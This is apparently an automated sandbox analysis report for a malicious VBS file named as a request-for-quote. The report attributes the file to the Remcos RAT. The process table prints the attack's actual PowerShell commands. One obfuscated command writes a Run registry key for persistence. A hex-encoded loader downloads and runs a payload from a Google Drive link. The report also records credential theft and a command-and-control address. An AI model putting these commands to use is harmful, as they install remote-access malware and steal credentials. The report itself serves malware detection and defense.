| File name: | RFQ_IMAGES_Hayyas (Waltham Cross).vbs |
| Full analysis: | https://app.any.run/tasks/bf54c5ae-eea6-4003-b0fb-3a9edcd835a4 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | July 13, 2020, 05:31:08 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | B4D24A672F4A1DAA990C11C03DB8295E |
| SHA1: | 16B930060DE04F72D7F9B735C5C383FBB256E2A4 |
| SHA256: | E81B0AB02B19AC2F9E57D1DB647377D1449A4F08BB95070B49F81249B44ED43F |
| SSDEEP: | 192:e3/ZI4m9m2/lxL/hwAH6t+g4rRXUVPKKe56EHHIrR0g+RHbb5UfHkU1JrRcAXhlK:i/Szm2dd/hwAH6tCiB+wtRDL6cU |
MALICIOUS
Changes the autorun value in the registry
- Powershell.exe (PID: 2656)
REMCOS was detected
- control.exe (PID: 2340)
Actions looks like stealing of personal data
- control.exe (PID: 3040)
- control.exe (PID: 1256)
Stealing of credential data
- control.exe (PID: 3040)
Uses NirSoft utilities to collect credentials
- control.exe (PID: 3040)
SUSPICIOUS
Executed via WMI
- Powershell.exe (PID: 2656)
- cmd.exe (PID: 2344)
- Powershell.exe (PID: 2996)
PowerShell script executed
- Powershell.exe (PID: 2996)
- Powershell.exe (PID: 2656)
Creates files in the user directory
- Powershell.exe (PID: 2996)
- Powershell.exe (PID: 2656)
Reads the machine GUID from the registry
- WScript.exe (PID: 1988)
- Powershell.exe (PID: 2656)
- Powershell.exe (PID: 2996)
Application launched itself
- control.exe (PID: 2340)
INFO
Reads settings of System Certificates
- Powershell.exe (PID: 2996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
50
Monitored processes
8
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 892 | C:\WINDOWS\syswow64\control.exe /stext "C:\Users\admin\AppData\Local\Temp\depuy" | C:\WINDOWS\syswow64\control.exe | — | control.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Control Panel Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1256 | C:\WINDOWS\syswow64\control.exe /stext "C:\Users\admin\AppData\Local\Temp\oyunzyhb" | C:\WINDOWS\syswow64\control.exe | control.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Control Panel Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1988 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\RFQ_IMAGES_Hayyas (Waltham Cross).vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2340 | "C:\WINDOWS\syswow64\control.exe" | C:\WINDOWS\syswow64\control.exe | Powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Control Panel Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2344 | cmd /c copy "C:\Users\admin\Desktop\RFQ_IMAGES_Hayyas (Waltham Cross).vbs" "C:\Users\admin\AppData\Local\Microsoft\" /Y | C:\Windows\system32\cmd.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2656 | Powershell $g='C:\Users\admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2996 | Powershell -ExecutionPolicy Bypass $eVsOKCmwhwGIfbAcCemV='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70 69 6E 67 20 3D 20 74 65 73 74 2D 63 6F 6E 6E 65 63 74 69 6F 6E 20 2D 63 6F 6D 70 20 67 6F 6F 67 6C 65 2E 63 6F 6D 20 2D 63 6F 75 6E 74 20 31 20 2D 51 75 69 65 74 7D 20 75 6E 74 69 6C 20 28 24 70 69 6E 67 29 3B 24 70 32 32 20 3D 20 5B 45 6E 75 6D 5D 3A 3A 54 6F 4F 62 6A 65 63 74 28 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 54 79 70 65 5D 2C 20 33 30 37 32 29 3B 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 72 76 69 63 65 50 6F 69 6E 74 4D 61 6E 61 67 65 72 5D 3A 3A 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 20 3D 20 24 70 32 32 3B 24 6D 76 3D 27 28 4E 27 2B 27 65 77 27 2B 27 2D 4F 27 2B 27 62 27 2B 27 6A 65 27 2B 27 63 27 2B 27 74 20 27 2B 20 27 4E 65 27 2B 27 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 27 2B 27 6C 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 61 27 2B 27 64 27 2B 27 53 27 2B 27 74 72 27 2B 27 69 6E 67 28 27 27 68 74 74 70 73 3A 2F 2F 64 72 69 76 65 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 75 2F 30 2F 75 63 3F 69 64 3D 31 38 32 55 76 69 43 45 66 6C 79 48 70 57 36 71 56 68 68 68 61 45 33 59 46 48 72 48 4E 6D 52 66 6B 26 65 78 70 6F 72 74 3D 64 6F 77 6E 6C 6F 61 64 27 27 29 27 7C 49 60 45 60 58 3B 24 61 73 63 69 69 43 68 61 72 73 3D 20 24 6D 76 20 2D 73 70 6C 69 74 20 27 2D 27 20 7C 46 6F 72 45 61 63 68 2D 4F 62 6A 65 63 74 20 7B 5B 63 68 61 72 5D 5B 62 79 74 65 5D 22 30 78 24 5F 22 7D 3B 24 61 73 63 69 69 53 74 72 69 6E 67 3D 20 24 61 73 63 69 69 43 68 61 72 73 20 2D 6A 6F 69 6E 20 27 27 7C 4D';$jm=$eVsOKCmwhwGIfbAcCemV.Split(' ') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3040 | C:\WINDOWS\syswow64\control.exe /stext "C:\Users\admin\AppData\Local\Temp\bccbynlgkfbwaghaaeffheyzpenegkfbw" | C:\WINDOWS\syswow64\control.exe | control.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Control Panel Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
859
Read events
722
Write events
137
Delete events
0
Modification events
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\131\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2656) Powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\131\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2656) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | |
Value: C:\Users\admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (2996) Powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
Executable files
0
Suspicious files
4
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2996 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IG5VQ2HK4DOEPDMR9E4W.temp | — | |
MD5:— | SHA256:— | |||
| 2656 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJRUP43ZEJRC2WDXWQEB.temp | — | |
MD5:— | SHA256:— | |||
| 1256 | control.exe | C:\Users\admin\AppData\Local\Temp\oyunzyhb | — | |
MD5:— | SHA256:— | |||
| 2656 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF18653d.TMP | binary | |
MD5:— | SHA256:— | |||
| 2344 | cmd.exe | C:\Users\admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs | text | |
MD5:— | SHA256:— | |||
| 2996 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1864fe.TMP | binary | |
MD5:— | SHA256:— | |||
| 2996 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 2656 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 3040 | control.exe | C:\Users\admin\AppData\Local\Temp\bccbynlgkfbwaghaaeffheyzpenegkfbw | text | |
MD5:A43033111C76A471A206FD7BD1A65909 | SHA256:DD223D12954EE65F8DAB66ACBBE2036F00A16E6529A15C069766BE2B84BA0393 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
1
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2996 | Powershell.exe | GET | 200 | 172.217.18.97:443 | https://doc-0o-8o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gn5bu227erqmtaqqd2ahtgjma7sc786o/1594618275000/16823922697999196009/*/182UviCEflyHpW6qVhhhaE3YFHrHNmRfk?e=download | US | text | 1.11 Mb | whitelisted |
884 | svchost.exe | GET | 302 | 172.217.18.14:443 | https://drive.google.com/u/0/uc?id=182UviCEflyHpW6qVhhhaE3YFHrHNmRfk&export=download | US | html | 388 b | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2996 | Powershell.exe | 172.217.18.14:443 | drive.google.com | Google Inc. | US | whitelisted |
2996 | Powershell.exe | 172.217.18.97:443 | doc-0o-8o-docs.googleusercontent.com | Google Inc. | US | whitelisted |
2340 | control.exe | 79.134.225.52:6666 | — | Andreas Fink trading as Fink Telecom Services | CH | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
drive.google.com |
| shared |
doc-0o-8o-docs.googleusercontent.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2340 | control.exe | A Network Trojan was detected | REMOTE [PTsecurity] Backdoor.Win32/Remcos RAT connection |